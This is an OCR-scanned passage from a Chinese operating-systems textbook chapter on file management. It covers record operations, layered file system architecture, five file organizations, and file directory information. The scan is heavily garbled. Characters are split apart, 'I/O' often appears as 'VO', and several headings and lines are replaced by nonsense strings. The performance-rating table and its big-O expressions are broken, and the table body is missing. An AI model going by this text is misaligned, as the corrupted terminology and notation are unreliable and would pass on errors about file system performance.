访问 。 文件 有 一 个 唯一 的 文件 名 ,可 以 被 创建 或 删除 。 访问 控制 通常 在 文件 级 实施 ， 即 在 一 个 共 
享 系统 中 , 用 户 和 程序 被 允许 或 被 拒绝 访问 整个 文件 。 在 一 些 更 复杂 的 系统 中 , 这 类 控制 也 可 以 
在 记录 级 或 域 级 实施 。 . 
有 些 文件 系统 中 ,文件 是 按照 域 而 不 是 记录 来 组 织 的 。 在 这 种 情况 下 , 文件 是 一 组 域 的 集合 。 
数据 库 (database) 是 一 组 相关 的 数据 的 集合 ， 它 的 本 质 特征 是 数据 元 素 间 存在 着 明确 的 关 
A, 并 且 可 供 不 同 的 应 用 程序 所 使 用 。 数 据 库 可 能 包含 与 一 个 组 织 或 项 目 相关 的 所 有 信息 ， 如 一 
家 商店 或 一 项 科学 研究 。 数 据 库 自 身 是 由 一 种 或 多 种 类 型 的 文件 组 成 。 通 常数 据 库 管理 系统 是 独 
立 于 操作 系统 的 。 尽 管 它 可 能 会 使 用 某 些 文件 系统 管理 程序 。 
用 户 和 应 用 程序 希望 能 够 使 用 文件 。 必 须 支 持 的 典型 操作 如 下 : 
@ Retrieve_All: 检索 一 个 文件 的 全 部 记录 。 当 应 用 程序 在 某 一 时 刻 必 须 处 理 文件 中 的 全 部 
信息 时 , 需要 用 到 这 个 操作 。 例 如 , 产生 文件 的 信息 摘要 的 应 用 程序 需要 检索 所 有 记录 。 
由 于 这 个 操作 顺序 地 访问 所 有 记录 , 它 通 常 等 同 于 术语 顺序 处 理 ( sequential processing )。 
@ Retrieve_One: 仅仅 要 求 检索 一 个 记录 。 交互 式 的 、 面 向 事务 的 应 用 程序 需要 这 个 操作 。 
© Retrieve Next: 要 求 根据 最 近 检 索 过 的 记录 ， 检 索 逻 辑 顺 序 上 的 下 一 个 记录 。 一 些 交 互 
式 应 用 程序 ， 如 填 表 ， 可 能 需要 这 类 操作 ， 执 行 查找 的 程序 也 需要 使 用 这 类 操作 。 
@ Retrieve_Previous: 类 似 于 Retrieve_Next, 但 此 时 要 求 检索 当前 访问 到 的 记录 前 面 的 一 


个 记录 。 

@ Insert_One: 在 文件 中 插入 一 个 新 记录 。 为 保持 文件 的 顺序 ， 新 记录 必须 插入 到 文件 中 
适当 的 位 置 。 

© Delete_One: 删除 一 个 已 存在 的 记录 。 为 保持 文件 的 顺序 ， 可 能 需要 更 新 某 些 连 接 或 别 
的 数据 结构 。 


è Update One: 检索 一 个 记录 , 更 新 该 记录 的 一 个 或 多 个 域 , 并 把 这 个 更 改 后 的 记录 写 回 
文件 。 同 样 ， 在 这 个 操作 中 需要 保持 文件 的 顺序 ， 如 果 记 录 的 长 度 发 生 了 变化 ， 更 新 操 
作 通 常 要 更 复杂 一 些 。 
@ Retrieve Few: 检索 一 部 分 记录 。 例 如 ， 应 用 程序 或 用 户 可 能 希望 检索 满足 一 些 特定 规 
则 的 所 有 记录 。 
这 些 是 经 常 对 文件 执行 的 操作 ， 它 们 会 影响 文件 的 组 织 方式 ， 相 关内 容 将 在 12.2 节 讲述 。 
需要 注意 的 是 , 并 不 是 所 有 的 文件 管理 系统 都 呈现 出 在 本 节 中 讨论 的 这 种 结构 。 在 UNIX 或 
类 UNIX 系统 上 ,文件 的 基本 结构 是 字 节 流 。 例 如 ， 一 个 C 程序 以 文件 的 形式 存储 ， 而 没有 物 
理 域 、 记 录 等 。 
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12.13 文件 管理 系统 


文件 管理 系统 是 一 组 系统 软件 ,为 使 用 文件 的 用 户 和 应 用 程序 提供 服务 。 在 典型 情况 下 , X 
件 管理 系统 是 用 户 或 应 用 程序 访问 文件 的 唯一 方式 , 它 使 得 用 户 或 程序 员 不 需要 为 每 个 应 用 程序 
开发 专用 软件 , 并 且 给 系统 提供 了 控制 最 重要 资源 的 方法 。 一 个 文件 管理 系统 需要 满足 以 下 目标 
[GROS86]: 
满足 数据 管理 的 要 求 和 用 户 的 需求 ， 包 括 存 储 数据 和 执行 上 述 操作 的 能 力 。 
最 大 限度 地 保证 文件 中 的 数据 有 效 。 
优化 性 能 ,包括 总 体 吞吐 量 ( 从 系统 的 角度 ) 和 响应 时 间 ( 从 用 户 的 角度 )。 
为 各 种 类 型 的 存储 设备 提供 IO 支持 。 
减少 或 消除 丢失 或 破坏 数据 的 可 能 性 。 
向 用 户 进 程 提供 标准 IO 接口 例 程 集 。 
在 多 用 户 系 统 中 为 多 个 用 户 提供 VO 支持 。 

关于 第 一 点 “满足 用 户 的 需求 "， 这 些 需 求 的 范围 取决 于 各 种 应 用 程序 和 计算 机 系统 的 使 用 
环境 。 对 于 交互 式 的 通用 系统 ， 其 最 小 需求 集合 如 下 : 

1) 每 个 用 户 都 可 以 创建 、 删 除 、 读 取 和 改变 文件 。 

2 ) 每 个 用 户 都 可 以 受 控 地 访问 其 他 用 户 的 文件 。 

3 ) 每 个 用 户 都 可 以 控制 允许 对 用 户 文件 进行 哪 种 类 型 的 访问 。 

4 ) 每 个 用 户 都 可 以 按照 与 问题 相 适应 的 形式 重新 构造 用 户 文件 。 

5 ) 每 个 用 户 都 可 以 在 文件 间 移 动 数据 。 

6) 每 个 用 户 都 可 以 备份 用 户 文件 ， 并 在 文件 遭 到 破坏 时 进行 恢复 。 

7 ) 每 个 用 户 都 可 以 通过 名 字 而 不 需要 数字 标识 访问 他 的 文件 。 

在 关于 文件 系统 的 整个 讨论 中 ,我 们 都 必须 牢记 这 些 目标 和 要 求 。 
文件 系统 架构 

一 个 了 解 文件 管理 范围 的 有 效 途 径 就 是 浏览 一 个 典型 的 软件 组 织 图 ， 如 图 12.1 AR. MA 
不 同 的 系统 有 不 同 的 组 织 方式 , 但 这 个 组 织 具有 相当 的 代表 性 。 在 最 底层 , 设备 驱动 程序 直接 与 
外 围 设 备 (或 它们 的 控制 器 或 通道 ) 通 信 。 设备 驱动 程序 负责 启动 该 设备 上 的 VO 操作 , 处 理 IO 
请 求 的 完成 。 对 于 文件 操作 ， 典 型 的 控制 设备 是 磁 
盘 和 磁带 设备 。 设 备 驱动 程序 通常 是 操作 系统 的 一 
部 分 。 

接 下 来 的 一 层 称 做 基本 文件 系统 或 物理 OR. 
这 是 与 计算 机 系统 外 部 环境 的 基本 接口 。 该 层 处 理 
在 磁盘 间或 磁带 系统 间 交 换 的 数据 块 ， 因 此 ， 它 关 
注 的 是 这 些 块 在 二 级 存储 和 内 存 缓冲 区 中 的 位 置 ， 
而 并 不 关注 数据 的 内 容 或 所 涉及 的 文件 的 结构 。 基 
本 文件 系统 通常 是 操作 系统 的 一 部 分 。 

基本 1O 管理 程序 负责 所 有 文件 IO 的 初始 和 终 图 12.1 文件 系统 软件 架构 
止 。 在 这 一 层 , 需 要 一 定 的 控制 结构 来 维护 设备 的 输入 /输出 、 调 度 和 文件 状态 。 基 本 VO 管理 
程序 根据 所 选择 的 文件 来 选择 执行 文件 VO 的 设备 , 为 优化 性 能 , 它 还 参与 调度 对 磁盘 和 磁带 的 
Vil, VO 缓冲 区 的 指定 和 辅 存 的 分 配 也 是 在 这 一 层 实现 的 。 基 本 IO 管理 程序 是 操作 系统 的 一 
部 分 。 
逻辑 VO 使 用 户 和 应 用 程序 能 够 访问 到 记录 。 因 此 ， 基本 文件 系统 处 理 的 是 数据 块 ， 而 逻辑 
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VO SRAM HEIR. BB VO 提供 一 种 通用 的 记录 VO 能 力 ， 并 维护 关于 文件 的 基本 
数据 。 

文件 系统 中 与 用 户 最 近 的 是 访问 方法 层 , 它 在 应 用 程序 和 文件 系统 以 及 保存 数据 的 设备 之 间 
提供 了 一 个 标准 接口 。 A A A a E E E LCA A EAA OAE 
一 些 最 常见 的 访问 方法 如 图 12.1 所 示 ， 对 它们 的 具体 描述 见 12.2 节 。 


文件 管理 功能 

图 12.2 显示 了 文件 系统 的 功能 概况 。 我 们 从 左 到 右 来 看 这 个 图 。 用 户 和 应 用 程序 通过 使 用 
创建 文件 、 删 除 文件 以 及 执行 文件 操作 的 命令 , 与 文件 系统 进行 交互 。 在 执行 任何 操作 之 前 , X 
件 系统 必须 确认 和 定位 所 选择 的 文件 。 这 要 求 使 用 某 种 类 型 的 目录 来 描述 所 有 文件 的 位 置 以 及 它 
们 的 属性 。 此 外 , 大 多 数 共 享 系统 都 实行 用 户 访问 控制 : 只 有 被 授权 用 户 才 允许 以 特定 的 方式 访 
问 特 定 的 文件 。 用 户 和 应 用 程序 可 以 在 文件 上 执行 的 基本 操作 是 在 记录 级 上 执行 的 。 用 户 和 应 用 
程序 把 文件 看 做 是 具有 组 织 记录 的 某 种 结构 ， 如 顺序 结构 ( 例如 ， 个 人 记录 按 姓氏 的 字母 顺序 
存储 )， 因 此 ， 为 了 把 用 户 命令 转换 成 特定 的 文件 操作 命令 ， 必 须 采用 适合 于 该 文件 结构 的 访问 
方法 。 

虽然 用 户 和 应 用 程序 关注 的 是 记录 , 但 VO 是 以 块 为 基础 来 完成 的 ， 因 此 , 文件 中 的 记录 必 
须 组 织 成 一 组 块 的 序列 来 输出 ,在 输入 后 将 各 块 组 合 起 来 。 支 持 文件 的 块 IO 需要 许多 功能 。 首 
先 必须 管理 二 级 存储 ， 包 括 把 文件 分 配 到 二 级 存储 中 的 空 闪 块 ， 再 者 还 需要 管理 空闲 存储 空间 ， 
以 便 知道 新 文件 和 现 有 文件 增长 时 可 以 使 用 鄂 些 块 。 此 外 ， 必 须 调度 单个 的 块 VO 请 求 , 这 个 问 
题 将 在 第 11 章 讲述 。 磁 盘 调 度 和 文件 分 配 都 影响 到 性 能 的 优化 ， 因 此 这 些 功能 需要 放 在 一 起 考 
虑 。 此 外 , 优化 还 取决 于 文件 结构 和 访问 方式 。 因此, 开发 一 个 从 性 能 的 角度 看 是 最 优 的 文件 管 
理 系统 是 一 个 相当 复杂 的 任务 。 


ae 内 存 缓冲 区 辅 存 (磁盘 ) 
ieee 中 的 物理 块 ” 中 的 物理 块 
É 
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用 户 访问 控制 


文件 管理 关注 的 问题 


操作 系统 关注 的 问题 


图 12.2 ”文件 管理 的 要 素 


图 12.2 表明 ， 文 件 管理 系统 作为 一 个 单独 的 系统 实用 程序 ， 和 操作 系统 关注 的 是 不 同方 面 
的 内 容 ， 它 们 的 交点 是 关于 记录 的 处 理 。 这 个 划分 是 任意 的 ， 不 同 的 系统 采用 不 同 的 方法 。 

本 章 的 其 余部 分 着 重 考虑 图 12.2 中 所 提出 的 设计 问题 。 首先 讲 述 的 是 文件 组 织 和 访问 方法 ， 
尽管 这 方面 的 内 容 已 经 超出 了 操作 系统 通常 所 考虑 的 范围 ,但 是 如 果 没 有 对 文件 组 织 和 访问 的 正 
确 评价 ， 就 不 可 能 对 与 文件 相关 的 其 他 设计 问题 进行 评价 ; 接 下 来 阐述 文件 目录 的 概念 , 它们 通 
常 是 由 操作 系统 代表 文件 管理 系统 进行 管理 的 ; 然后 讲述 文件 管理 的 物理 VO 特征 , 它们 作为 操 
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作 系统 设计 的 一 个 方面 , 其 中 的 一 个 问题 是 逻辑 记录 被 组 织 成 物理 块 的 方式 ; 最 后 讲述 有 关 二 级 
存储 中 的 文件 分 配 和 二 级 存储 空闲 空间 的 管理 等 问题 。 


12.2 文件 组 织 和 访问 


本 节 使 用 的 术语 文件 组 织 ( file organization) 指 文件 中 记录 的 逻辑 结构 , 它 由 用 户 访问 记录 
的 方式 确定 。 文 件 在 二 级 存储 中 的 物理 组 织 取决 于 分 块 策略 和 文件 分 配 策略 , 这 方面 的 问题 将 在 
本 章 后 面 的 部 分 讲述 。 

在 选择 文件 组 织 时 ， 有 五 项 重要 原则 ; 访问 快速 、 易 于 修改 、 节 约 存储 空间 、 维 护 简单 、 可 
靠 性 。 

这 些 原 则 的 相对 优先 级 取决 于 将 要 使 用 这 些 文件 的 应 用 程序 。 例 如, 如 果 一 个 文件 仅仅 以 批 
处 理 方式 处 理 , 并 且 每 次 都 要 访问 到 它 的 所 有 记录 , 则 会 很 少 需 要 关注 用 于 检索 一 个 记录 的 快速 
WE. FE CD-ROM 中 的 文件 永远 不 会 被 修改 ， 因 此 易于 修改 这 一 点 根本 不 需要 考虑 。 

这 些 原 则 可 能 是 矛盾 的 。 例 如 ,为 了 节约 存储 空间 ,数据 元 余 应 该 最 小 ; 但 在 另 一 方面 ,元 
余 是 提高 数据 访问 速度 的 一 种 主要 手段 。 这 方面 的 一 个 例子 是 使 用 索引 。 

已 经 实现 或 刚刚 提出 的 可 选择 的 文件 组 织 的 数目 是 相当 多 的 ,甚至 可 以 编 成 一 本 专门 介绍 文 
件 系统 的 书 。 在 本 节 这 个 简单 的 概述 中 , 主要 介绍 五 种 基本 组 织 。 实 际 系统 中 使 用 的 大 多 数 结构 
或 者 正好 是 这 几 类 之 一 ， 或 者 是 这 些 组 织 的 组 合 。 这 五 种 组 织 为 堆 、 顺 序 文件 、 索 引 师 序 文件 、 
索引 文件 、 直 接 或 散 列 文件 ， 图 12.3 描绘 了 前 四 种 。 





可 变 长 度 的 记录 固定 长 度 的 记录 


TERREA 按 固定 顺序 的 固定 的 域 集合 
按时 间 先 后 顺序 排序 基于 关键 字 域 的 顺序 
a) 堆 文 件 b) 顺序 文件 





o 索引 顺序 文件 d) 索引 文件 
图 12.3 常用 的 文件 组 织 
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# 12.1 总 结 了 这 五 种 组 织 的 相关 性 能 特征 。 。 


表 12.1 五 种 基本 文件 组 织 的 性 能 等 级 [WIED87] 








A 表示 优秀 ， 非 常 适合 于 这 个 目标 一 DO 


B 表示 好 = 0(0 xr) 

CARAS = O(r log n) 

D 表示 需要 额外 的 努力 = O(n) 

E 表示 需要 特别 努力 才 有 可 能 =0(r xn) 

F 表示 根本 不 适合 这 个 目标 = O(n>1) 

HP, 表示 结果 的 大 小 ，o 表示 溢出 的 记录 数 ， 严 表示 文件 中 的 记录 数 。 
12.2.1 HË 


堆 (pile) 是 最 简单 的 文件 组 织 形式 。 数 据 按 它们 到 达 的 顺序 被 采集 ， 每 个 记录 由 一 串 数 据 
组 成 。 堆 的 目的 仅仅 是 积累 大 量 的 数据 并 保存 数据 。 记 录 可 以 有 不 同 的 域 , 或 者 域 相似 但 顺序 不 
同 。 因 此 , 每 个 域 应 该 是 自 描述 的 , 包括 域名 和 值 。 每 个 域 的 长 度 由 划分 符 隐 式 地 指定 ， 或 者 明 
确 地 包含 在 一 个 子 域 中 ， 或 者 是 该 域 类 型 的 默认 长 度 。 

由 于 堆 文件 没有 结构 ,因而 对 记录 的 访问 是 通过 穷 举 查找 的 方式 , 也 就 是 说 , 如 果 想 找到 包 
括 某 一 特定 域 且 值 为 某 一 特定 值 的 记录 ， 则 需要 检查 堆 中 的 每 一 个 记录 ， 直 到 找到 想 要 的 记录 ， 
或 者 查找 完整 个 文件 为 止 。 如 果 想 查找 包括 某 一 特定 域 , 或 者 包含 具有 某 一 特定 值 的 域 的 所 有 记 
录 ， 则 必须 查找 整个 文件 。 

当 数 据 在 处 理 前 采集 并 存储 时 , 或 者 当 数据 难以 组 织 时 , 会 用 到 堆 文 件 。 当 保存 的 数据 大 小 
和 结构 不 同时 , 这 种 类 型 的 文件 空间 使 用 情况 很 好 , 能 较 好 地 用 于 穷 举 查找 , 且 易 于 修改 。 但是， 
除了 这 些 受 限制 的 使 用 ， 这 类 文件 对 大 多 数 应 用 都 是 不 适用 的 。 


12.2.2 ”顺序 文件 


顺序 文件 是 最 常用 的 文件 组 织 形式 。 在 这 类 文件 中 , 每 个 记录 都 使 用 一 种 固定 的 格式 。 所 有 
记录 都 具有 相同 的 长 度 , 并 且 由 相同 数目 、 长 度 固 定 的 域 按 特 定 的 顺序 组 成 。 由 于 每 个 域 的 长 度 
和 位 置 已 知 ， 因 此 只 需要 保存 各 个 域 的 值 ， 每 个 域 的 域名 和 长 度 是 该 文件 结构 的 属性 。 

一 个 特殊 的 域 称 做 关键 域 (key field )。 关 键 域 通常 是 每 个 记录 的 第 一 个 域 ， 唯 一 地 标识 这 
个 记录 ,因此 ,不同 记录 的 关键 域 值 是 不 同 的 。 此 外 ,记录 按 关键 域 来 存储 : 文本 关键 域 按 字 母 
顺序 ， 数 字 关键 域 按 数字 顺序 。 

顺序 文件 通常 用 于 批 处 理应 用 中 , 并 且 如 果 这 类 应 用 涉及 对 所 有 记录 的 处 理 ( 如 关于 记 账 或 
工资 单 的 应 用 )， 顺 序 文件 通常 是 最 佳 的 。 顺 序 文件 组 织 是 唯一 可 以 很 容易 地 存储 在 磁盘 和 磁带 
中 的 文件 组 织 。 


O 表 中 使 用 了 大 O ( 大写 ) 表示 法 来 描述 算法 的 时 间 复 杂 度 。 附 录 D 对 这 种 表示 法 进行 了 解释 。 
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对 于 查询 或 更 新 记录 的 交互 式 应 用 , 顺序 文件 表现 出 很 差 的 性 能 。 在 访问 时 , 为 了 匹配 关键 
域 , 需要 顺序 查找 文件 。 如 果 整 个 文件 或 文件 的 一 大 部 分 可 以 一 次 性 地 取 人 和 人 内存, 则 还 可 能 存在 
更 有 效 的 查找 技术 。 尽 管 如 此 , 在 访问 一 个 大 型 顺序 文件 中 的 记录 时 , 还 是 会 遇 到 相当 多 的 处 理 
和 延迟 。 除 此 之 外 还 有 一 些 问题 。 在 典型 情况 下 ,顺序 文件 按照 记录 在 块 中 的 简单 顺序 存储 ,也 
就 是 说 , 文件 在 磁带 或 磁盘 上 的 物理 组 织 直 接 对 应 于 文件 的 逻辑 组 织 。 在 这 种 情况 下 ,一 个 常用 
的 处 理 过 程 是 把 新 记录 放 在 一 个 单独 堆 文件 中 , 称 做 日 志文 件 或 事务 文件 , 通过 周期 性 地 执行 一 
个 成 批 更 新 ， 把 日 志文 件 合并 到 主 文件 ， 并 按 正确 的 关键 字 顺 序 产生 一 个 新 文件 。 

另 一 种 选择 是 把 顺序 文件 组 织 成 链表 的 形式 。 一 个 或 多 个 记录 保存 在 每 个 物理 块 中 。 磁盘 中 的 
每 个 块 含有 指向 下 一 个 块 的 指针 。 新 记录 的 插入 仅 涉 及 指针 操作 ， 而 不 再 要 求 将 新 记录 放置 在 一 
个 特定 的 物理 块 位 置 。 因 此 ， 该 方法 可 以 带 来 一 些 方便 ， 但 它 是 以 增加 额外 的 处 理 和 空间 开销 为 
代价 的 。 


12.2.3 ”索引 顺序 文件 


克服 顺序 文件 的 缺点 的 一 种 常用 的 方法 是 索引 顺序 文件 。 索 引 顺 序 文件 保留 了 顺序 文件 的 关 
键 特征 : 记录 按照 关键 域 的 顺序 组 织 起 来 。 但 它 还 增加 了 两 个 特征 : 用 于 支持 随机 访问 的 文件 索 
引 和 溢出 文件 。 索 引 提 供 了 快速 接近 目标 记录 的 查找 能 力 。 滋 出 文件 类 似 于 顺序 文件 中 使 用 的 日 
志文 件 ， 但 是 溢出 文件 中 的 记录 可 以 根据 它 前 面 记录 的 指针 进行 定位 。 

最 简单 的 索引 顺序 结构 只 使 用 一 级 索引 , 这 种 情况 下 的 索引 是 一 个 简单 的 顺序 文件 。 索引 文 
件 中 的 每 个 记录 由 两 个 域 组 成 : 关键 域 和 指向 主 文件 的 指针 , 其 中 关键 域 和 主 文件 中 的 关键 域 相 
H. 为 查找 一 个 特定 的 域 , 首先 查找 索引 ,查找 关键 域 值 等 于 目标 关键 域 值 或 者 位 于 目标 关键 域 
值 之 前 且 最 大 的 索引 ， 然 后 在 该 索引 的 指针 所 指 的 主 文件 中 的 位 置 处 开始 查找 。 

为 说 明 该 方法 的 有 效 性 , 考虑 一 个 包含 100 万 条 记录 的 顺序 文件 , 为 查找 某 一 特定 的 关键 域 
fA, 平均 需要 访问 50 万 次 记录 。 现 在 假设 创建 一 个 包含 了 1000 项 的 索引 , 索引 中 的 关键 域 或 多 
或 少 均匀 分 布 在 主 文件 中 , 为 找到 这 个 记录 , 平均 只 需要 在 索引 文件 中 进行 500 次 访问 , 接着 在 
主 文件 中 进行 500 次 访问 。 查 找 的 开销 从 500 000 减少 到 1000。 

文件 可 以 按 以 下 方式 处 理 : 主 文件 中 的 每 个 记录 包含 一 个 附加 域 。 附 加 域 对 应 用 程序 是 不 可 
见 的 , 它 是 指向 溢出 文件 的 一 个 指针 。 当 往 文件 中 插 人 一 个 新 记录 时 ， 它 被 添加 到 溢出 文件 ， 然 
后 修改 主 文件 中 逻辑 顺序 位 于 这 个 新 记录 之 前 的 记录 ， 使 其 包含 指向 溢出 文件 中 新 记录 的 指针 。 
如 果 新 记录 前 面 的 那个 记录 也 在 溢出 文件 中 , 那么 修改 新 记录 前 面 的 那个 记录 的 指针 。 和 顺序 文 
件 一 样 ， 索 引 顺 序 文 件 有 时 候 也 会 按 批 处 理 的 方式 合并 溢出 文件 。 

索引 顺序 文件 极 大 地 减少 了 访问 单个 记录 的 时 间 , 同时 保留 了 文件 的 顺序 特性 。 为 顺序 地 处 
理 整 个 文件 , 需要 按 顺 序 处 理 主 文件 中 的 记录 , 直到 过 到 一 个 指向 溢出 文件 的 指针 ,然后 继续 访 
问 溢出 文件 中 的 记录 ， 直 到 过 到 一 个 空 指针 ， 然 后 恢复 在 主 文件 中 的 访问 。 

为 提供 更 有 效 的 访问 , 可 以 使 用 多 级 索引 。 最 低 一 级 的 索引 文件 看 做 是 顺序 文件 , 然后 为 该 
文件 创建 高 一 级 的 索引 文件 。 再 次 考虑 一 个 包含 100 万 条 记录 的 文件 ,首先 构造 具有 10 000 项 
的 低级 索引 ,然后 为 这 个 低级 索引 构造 100 项 的 高 级 索引 。 查 找 过 程 从 高 级 索引 开始 ,找到 指向 
低级 索引 的 一 项 (平均 长 度 =50 次 访问 )。 接 着 查找 这 个 索引 ， 找 到 指向 主 文件 的 一 项 (平均 长 
度 =50 次 访问 )， 然 后 查找 主 文件 (平均 长 度 =50 次 访问 )。 因 此 平均 查找 长 度 从 500 000 减少 到 
1000, 最 后 减少 到 150。 


12.2.4 索引 文件 
索引 顺序 文件 保留 了 顺序 文件 的 一 个 限制 : 基于 文件 的 一 个 域 进 行 处 理 。 当 需要 基于 其 他 属 


378 RED 1/0 fot 





性 而 不 是 关键 域 查找 一 个 记录 时 , 这 两 种 形式 的 顺序 文件 都 是 不 能 胜任 的 。 但 在 某 些 应 用 中 , 却 
需要 这 种 灵活 性 。 

为 实现 这 一 点 ， 需 要 一 种 采用 多 索引 的 结构 ， 每 种 可 能 成 为 查找 条 件 的 域 都 有 -- 个 索引 。 索 引 
文件 一 般 都 据 弃 了 顺序 性 和 关键 字 的 概念 ， 只 能 通过 索引 来 访问 记录 。 其 结果 是 对 记录 的 放置 位 置 
不 再 有 限制 ， 只 要 至 少 有 一 个 索引 的 指针 指向 这 个 记录 即 可 。 此 外 ， 还 可 以 使 用 长 度 可 变 的 记录 。 

可 以 使 用 两 种 类 型 的 索引 。 完 全 索引 中 包含 主 文件 中 每 条 记录 的 索引 项 ， 为 了 易于 查找 ， 索 
引 自 身 被 组 织 成 一 个 顺序 文件 。 部 分 索引 只 包含 那些 有 感 兴趣 域 的 记录 的 索引 项 。 对 于 长 度 可 变 
的 记录 ， 某 些 记 录 并 不 是 包含 了 所 有 的 域 。 当 往 主 文件 中 增加 一 条 新 记录 时 ， 索 引文 件 必 须 全 部 
更 新 。 

索引 文件 大 多 用 于 对 信息 的 及 时 性 要 求 比较 严格 并 且 很 少 会 对 所 有 数据 进行 处 理 的 应 用 程 
序 中 ， 例 如 航空 公司 订 票 系统 和 商品 库存 控制 系统 。 


12.2.5 ”直接 文件 或 散 列 文件 


直接 文件 或 散 列 文件 开发 直接 访问 磁盘 中 任何 一 个 地 址 已 知 的 块 的 能 力 。 和 顺序 文件 以 及 索 
引 顺 序 文件 一 样 ， 每 一 条 记录 中 都 需要 一 个 关键 域 。 但 是 这 里 没有 顺序 排序 的 概念 。 

直接 文件 使 用 基于 关键 字 的 散 列 ， 这 项 功能 已 在 附录 8A 中 描述 。 图 8.27b 给 出 了 散 列 的 组 
织 和 散 列 文件 中 典型 使 用 的 溢出 文件 的 类 型 。 

直接 文件 常 在 要 求 快 速 访问 时 使 用 ， 并 且 记录 的 长 度 是 固定 的 ， 通 常 一 次 只 访问 一 条 记录 ， 
例如 目录 、 价 格 表 、 调 度 和 名 字 列 表 。 


12.3 文件 目录 


12.3.1 内 容 


与 任何 文件 管理 系统 和 文件 集合 相关 联 的 是 文件 目录 , 目录 包含 关于 文件 的 信息 , 这 些 信息 
包括 属性 、 位 置 和 所 有 权 。 大 部 分 这 类 信息 , 特别 是 与 存储 相关 的 信息 , 都 是 由 操作 系统 管理 的 。 
目录 自身 是 一 个 文件 , 并 且 可 以 被 各 种 文件 管理 例 程 访问 。 尽 管用 户 和 应 用 程序 也 可 以 得 到 目录 
中 的 某 些 信 息 ， 但 这 通常 是 由 系统 例 程 间接 提供 的 。 

表 12.2 列 出 了 目录 通常 为 系统 中 每 个 文件 保存 的 信息 。 从 用 户 的 角度 看 ， 目 录 在 用 户 和 应 
用 所 知道 的 文件 名 和 文件 自身 之 间 提 供 了 一 种 映射 。 因 此 , 每 个 文件 项 都 包含 文件 名 。 实 际 上 所 
有 系统 都 需要 处 理 不 同类 型 的 文件 和 不 同 的 文件 组 织 , 因此 还 必须 提供 这 方面 的 信息 。 文件 信 息 
的 一 个 重要 分 类 涉及 它 的 存储 信息 , 包括 它 的 位 置 和 大 小 。 在 共享 系统 中 ,还 必须 提供 用 于 文件 
的 访问 控制 信息 。 典 型 情况 下 , 用户 是 文件 的 所 有 者 ,可 以 给 其 他 用 户 授予 一 定 的 访问 权限 。 最 
后 ， 还 需要 有 使 用 信息 ， 用 来 管理 当前 对 文件 的 使 用 并 记录 文件 的 使 用 历史 。 


表 12.2 文件 目录 的 信息 单元 





BAER 
文件 名 由 创建 者 (用户 或 程序 ) 选择 的 名 字 ， 在 同一 个 目录 中 必须 是 唯一 的 
文件 类 型 例如 文本 文件 、 二 进 制 文件 、 加 载 模块 等 
文件 组 织 供 那些 支持 不 同 组 织 的 系统 使 用 

地 址 信息 
卷 指出 存储 文件 的 设备 
起 始 地 址 文件 在 辅 存 中 的 起 始 物理 地 址 ( 例如 在 磁盘 上 的 柱 面 、 磁 道 和 块 号 ) 
使 用 大 小 文件 的 当前 大 小 ， 单 位 为 字 节 、 字 或 块 


分 配 大 小 文件 的 最 大 大 小 
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〈 续 ) 
访问 控制 信息 
所 有 者 被 指定 为 控制 该 文件 的 用 户 。 所 有 者 可 以 授权 或 拒绝 其 他 用 户 的 访问 ， 并 可 以 改变 
给 予 他 们 的 权限 
访问 信息 这 个 单元 最 简单 的 形式 包括 每 个 授权 用 户 的 用 户 名 和 口令 
允许 的 行为 控制 读 、 写 、 执 行 以 及 在 网 上 传送 
使 用 信息 
数据 创建 当 文 件 第 一 次 放置 在 目录 中 时 
创建 者 身份 通常 是 当前 所 有 者 ， 但 并 不 一 定 必须 是 当前 所 有 者 
最 后 一 次 读 访问 的 日 其 最 后 一 次 读 记 录 的 日 期 
最 后 一 次 读 的 用 户 身份 最 后 一 次 进行 读 的 用 户 
最 后 一 次 修改 的 日 期 最 后 一 次 修改 、 插 入 或 删除 的 日 期 
最 后 一 次 修改 者 的 身份 最 后 一 次 进行 修改 的 用 户 
最 后 一 次 备份 的 日 期 最 后 一 次 把 文件 备份 到 另 一 个 存储 介质 中 的 日 期 


有 关 当 前 文件 活动 的 信息 ， 如 打开 文件 的 进程 、 是 否 被 一 个 进程 加 锁 、 文 件 是 否 在 


当前 使 用 内 存 中 被 修改 但 没有 在 磁盘 中 修改 等 


12.3.2 ”结构 


不 同系 统 对 表 12.2 中 的 信息 的 保存 方式 也 大 不 相同 。 某 些 信息 可 以 保存 在 与 文件 相关 联 的 
头 记 录 中 , 这 可 以 减少 目录 所 需要 的 存储 量 , 使 得 可 以 在 内 存 中 保留 所 有 或 大 部 分 目录 ,从 而 提 
BERE., BR, 一 些 重要 单元 必须 在 目录 中 ， 在 典型 情况 下 包括 名 字 、 地 址 、 大 小 和 组 织 。 

最 简单 的 目录 结构 形式 是 一 个 目录 项 列表 , 每 个 文件 一 个 目录 项 。 这 种 结构 可 以 用 于 表示 最 
简单 的 顺序 文件 , 文件 名 用 作 关 键 字 。 在 一 些 早期 的 单 用 户 系 统 中 就 已 经 使 用 了 这 种 技术 , 但 是 
当 多 个 用 户 共享 一 个 系统 或 者 单个 用 户 使 用 多 个 文件 时 ， 就 远 远 不 够 了 。 

为 理解 一 个 文件 结构 的 需求 ， 首 先 考虑 可 能 在 目录 上 执行 的 操作 的 类 型 

@ ER: 当 用 户 或 应 用 程序 引用 一 个 文件 时 ,必须 查找 目录 ， 以 找到 该 文件 相应 的 目录 项 。 

o 创建 文件 : 当 创建 一 个 新 文件 时 ， 必 须 在 目录 中 增加 一 个 目录 项 。 

@ 删除 文件 : 当 删 除 一 个 文件 时 ， 必 须 在 目录 中 删除 相应 的 目录 项 。 

@ 显示 目录 : 可 能 会 请 求 目录 的 全 部 或 部 分 内 容 。 通 常 ， 这 个 请 求 是 由 用 户 发 出 的 ， 用 于 
显示 该 用 户 所 拥有 的 所 有 文件 和 每 个 文件 的 某 些 属性 〈 例如 类 型 、 访 问 控制 信息 、 使 用 
信息 )。 

o BAAR: 由 于 某 些 文件 属性 保存 在 目录 中 , 因而 这 些 属 性 的 变化 需要 改变 相应 的 目录 项 。 

简单 列表 难以 支持 这 些 操作 。 考虑 单 用 户 的 需求 : 用 户 可 能 有 许多 类 型 的 文件 , 包括 字 处 理 
文本 文件 、 图 形 文 件 、 电 子 表 格 等 , 并 且 用 户 可 能 希望 按照 项 目 、 类 型 或 其 他 某 种 方便 的 方式 组 
织 这 些 文件 。 如 果 目 录 是 一 个 简单 的 顺序 列表 , 则 它 对 于 组 织 文件 没有 任何 帮助 , 并 且 强 人 迫 用 户 
不 要 对 两 种 不 同类 型 的 文件 使 用 相同 的 名 字 。 这 个 问题 在 一 个 共享 的 系统 中 会 变 得 更 糟 。 命名 的 
